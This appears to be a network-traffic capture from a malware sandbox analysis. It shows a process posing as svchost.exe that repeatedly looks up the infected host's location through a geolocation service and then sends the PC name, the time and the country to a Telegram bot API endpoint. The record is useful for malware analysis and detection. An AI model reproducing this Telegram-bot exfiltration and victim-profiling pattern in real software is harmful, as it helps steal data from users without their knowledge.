2025-01-03 08:21:13 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:13 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207262 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0JCmJwG8Ap2rI1x1zdVb82d8q3FXGcbUNT3npM6BxLyh2lLGg3P0KS3VtAy%2BshS8fhvXHOWANVp%2ByAI04dUohR1l%2FdTXyNLBw%2FGLO35O6HluVytzoBlBrI8Hb5GLlwRDr%2FZrQAJs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc192f60f2a43ef-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1601&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1792510&cwnd=237&unsent_bytes=0&cid=8b6a50fdba05e91b&ts=334&x=0"
2025-01-03 08:21:13 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49727	188.114.96.3	443	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:14 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-03 08:21:14 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:14 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207263 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tZTVDvQ9R6h27N9tsexVe1VuGPkKUP9%2Bpxb%2FL4VtUuD30mWLWSSahCCqgQ4GyckG84eSxz1kxxQH%2BTO5ZFasSC09D1rlmy3VR78WW46bbf83qLQqUyDzScY1tcYhkxTk0QVrMvyM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc192ff0c3f4291-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2154&min_rtt=2145&rtt_var=822&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1317095&cwnd=207&unsent_bytes=0&cid=581202ccbf6867e9&ts=155&x=0"
2025-01-03 08:21:14 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49738	188.114.96.3	443	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:15 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-03 08:21:16 UTC	849	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:16 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207265 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=47Lo74t2PWpDaJc9Bn1SuxGcz9ba1hsyMBBWY0VkahWhREZtTB3pacQx1BU8UfL8ZDjP2zOnWXqsUuaRfpsQcTmIKycmXzwF864QYo2F4djN6RpIFBi0hFta4KGsUB7CBUoJ78qj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc193073938729b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1889&min_rtt=1876&rtt_var=730&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1471774&cwnd=249&unsent_bytes=0&cid=1f48f6334a5840c2&ts=157&x=0"
2025-01-03 08:21:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49746	188.114.96.3	443	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:17 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-03 08:21:17 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:17 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207266 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GFkrQaVaD7sdEn2XbbSS%2FlbLJzuA5QGP92DPNYgMeBu2WgNt4f4lV2q1yXgDQJ8aTpBuLXa604%2FJ0R7IM5rkBUh6Jw2XlYbsgSqWRenCmB5w7B4%2F7hJWXcXGFOQK3ZRdNiYqs%2Fh4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc1930f5f8d0f6d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1670&rtt_var=629&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1734997&cwnd=239&unsent_bytes=0&cid=c137778b55f4cf7e&ts=144&x=0"
2025-01-03 08:21:17 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49758	188.114.96.3	443	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:18 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-03 08:21:18 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:18 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207267 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ut9U2MTn3jZJpWgDGYmPR4m5f%2FC5PKUfkQfYcUa395m9KWBvL1%2FwfgA6fCVgTQS1m8nMrmJsqwB9ytC04LE8e0KjMl4aecukKzkHrIfoywSR5TLTxa0j%2Bjw6MVZvISiSaIaHObvK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc193177f31de96-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1583&rtt_var=624&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1844598&cwnd=224&unsent_bytes=0&cid=d63d53db9223553d&ts=139&x=0"
2025-01-03 08:21:18 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49768	188.114.96.3	443	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:19 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-03 08:21:20 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207269 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k5t8gu1eQwP75JmCRwlZZa2bcDybHBm1dYN3n%2BcVPoulSYr4g8oC7Y4YrLpScETGDkrKvob077advJB4TkuIBwq%2FC%2Fc7jFsQTONFo82bcc290DwDU94WTHNh2nLJkLqASl%2BmTFch"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc1931fab108c33-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1962&rtt_var=750&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1444829&cwnd=245&unsent_bytes=0&cid=594978a04e5fd056&ts=136&x=0"
2025-01-03 08:21:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49778	188.114.96.3	443	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:21 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-03 08:21:21 UTC	853	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207270 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bz7uqHHkFUZPQEJVvam7RW45OAHgP63JR3WGW3UcU3AVIcPfouoj%2Bh842LT7P0p%2FivEJDAkuJzMSZCmIybH9oslhK7c84iMt8o1gkneUki12OaOdDbbcWWwKZUJkVex4mKsVhEAv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc19327b93c434b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1573&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1814791&cwnd=243&unsent_bytes=0&cid=514376c756abeb71&ts=140&x=0"
2025-01-03 08:21:21 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49788	188.114.96.3	443	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:22 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-03 08:21:22 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:22 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207271 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ynzLrCLPsv5eTh7NKBv%2BpgrhYUQKtrToyR%2FY%2FyuVpnxm5SJErXdgRCe0AyMMOh6l2MY2hNbnXZbgZfauQHbH0Ha9GLNFVnz1npwakeD%2F%2BLPcluc3iktp9LkyZi443TT8ZMvDMLpz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc1932fd87e7d06-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1930&rtt_var=746&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1512953&cwnd=244&unsent_bytes=0&cid=e80fe3fa3828b436&ts=148&x=0"
2025-01-03 08:21:22 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49797	188.114.96.3	443	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:23 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-03 08:21:24 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207273 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HILiX3beoie1nURzjhAQL54pfnb9QceVMIuAGXt%2F0GS%2FwcaB9Nx7jqGtE34dzg92jx%2BNuSDIFmesKPZ7xs6LjgZpHrH%2BMzR6BVKc7Q%2FjgBSPqMCFBrABWSKZvyknIgtKaoiOUG0G"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc19338abc34257-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2178&min_rtt=2174&rtt_var=824&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1321865&cwnd=215&unsent_bytes=0&cid=1eb07aa352c23fed&ts=164&x=0"
2025-01-03 08:21:24 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49806	149.154.167.220	443	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:24 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20and%20Time:%2003/01/2025%20/%2014:56:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20399601%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-03 08:21:24 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 03 Jan 2025 08:21:24 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-03 08:21:24 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49812	188.114.96.3	443	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:25 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-03 08:21:25 UTC	851	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1207274 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JfqW2ArFb7Z4wXz%2BAZKG8DTzLui46kHfQBAPs9M7mxISOpyiFlrJHVtrVTteYdSzrBBnYZtHYaORkc5otNRLCWiQ80LIWyvrPCJzMFSngUOCZ1CGptaA2Rgtbb3korJqflsYgXvV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc19342094943dd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1574&rtt_var=597&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1820448&cwnd=196&unsent_bytes=0&cid=882f0621dbd53786&ts=191&x=0"
